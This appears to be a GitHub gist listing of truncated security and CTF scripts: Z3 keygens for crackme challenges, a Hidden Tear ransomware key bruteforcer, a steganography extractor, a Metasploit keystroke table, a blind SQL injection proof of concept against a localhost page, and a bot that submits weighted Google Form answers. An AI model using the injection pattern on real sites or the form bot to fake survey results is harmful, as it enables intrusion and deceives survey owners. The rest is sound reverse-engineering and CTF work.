Skip to content

Instantly share code, notes, and snippets.

View bin300_solver.py
from z3 import *
from struct import pack
# define vars
LENGTH = 8
DEBUG = 0
Buf = [BitVec("%i" % i, 16) for i in range(LENGTH)]
solver = Solver()
solver.add(
@mokhdzanifaeq
mokhdzanifaeq / poc.py
Created Dec 11, 2018
blind sql injection
View poc.py
import requests
tmp = '0x'
flag = ''
length = 1
# get flag length
while True:
r = requests.get('http://localhost/post.php?id=length(@bounty)-{}'.format(length - 1))
if '1337' in r.content: break
@mokhdzanifaeq
mokhdzanifaeq / brute.py
Last active Nov 26, 2018
multithreaded hidden tear bruteforcer. start from the defined tick and decrease from there
View brute.py
# pip install pycryptodome
from Crypto.Protocol.KDF import PBKDF2
from Crypto.Cipher import AES
from hashlib import sha256
from datetime import datetime
from ctypes import *
import multiprocessing as mp
# http://referencesource.microsoft.com/#mscorlib/system/random.cs
class Random(object):
@mokhdzanifaeq
mokhdzanifaeq / bot.py
Created Feb 12, 2018
google form bot with weighted answer
View bot.py
import os,sys
import requests
import re
import ast
import json
import time
from numpy.random import choice
loop = 102
@mokhdzanifaeq
mokhdzanifaeq / regex.py
Last active Jun 12, 2017
satisfying regular expression using smt solver
View regex.py
import re
import sys
import string
from z3 import *
# hackish way to generate string that satisfy simple regex
# what's not supported: group reference & look behind
# usage: python regex.py PATTERN LENGTH
pattern = sys.argv[1]
@mokhdzanifaeq
mokhdzanifaeq / extract.py
Last active Apr 21, 2017
extract data embeded in pixel channels
View extract.py
from PIL import Image
import argparse
from collections import OrderedDict
def parseMask(string):
mask = []
for val in string.split(","):
if "-" in val:
min, max = val.split("-")
mask += [1 << (i - 1) for i in range(int(min), int(max) + 1)]
@mokhdzanifaeq
mokhdzanifaeq / extract.rb
Created Nov 23, 2016
extract keystroke from buffer data [metasploit]
View extract.rb
// extracted from metasploit source code
// need to get hex stream of the buffer
VirtualKeyCodes = {
1 => %W{ LClick },
2 => %W{ RClick },
3 => %W{ Cancel },
4 => %W{ MClick },
8 => %W{ Back },
9 => %W{ Tab },
@mokhdzanifaeq
mokhdzanifaeq / keygen.py
Last active Apr 13, 2016
keygen for challenge4_ok using Z3 theorem prover
View keygen.py
# challenge4_ok.exe - https://drive.google.com/open?id=0B_bQeUUGe4uLcXNqRnBBand5Yk0
from z3 import *
import sys
# argv[1] == key length
length = int(sys.argv[1])
if length < 5:
print "length must be more than 4!"
exit()
@mokhdzanifaeq
mokhdzanifaeq / keygen.py
Last active Mar 27, 2016
keygen for challenge3
View keygen.py
# challenge3 - https://drive.google.com/file/d/0B_bQeUUGe4uLM3BWd1dqTVF4TVE/view?usp=sharing
from z3 import *
import sys
# define the variables
chars = IntVector("", 7)
solver = Solver()
constraint = []
View ex03.py
from z3 import *
from random import shuffle
# define the variables
chars = IntVector("", 16)
solver = Solver()
# all values are printable chararacters (33 - 126)
for i in range(16):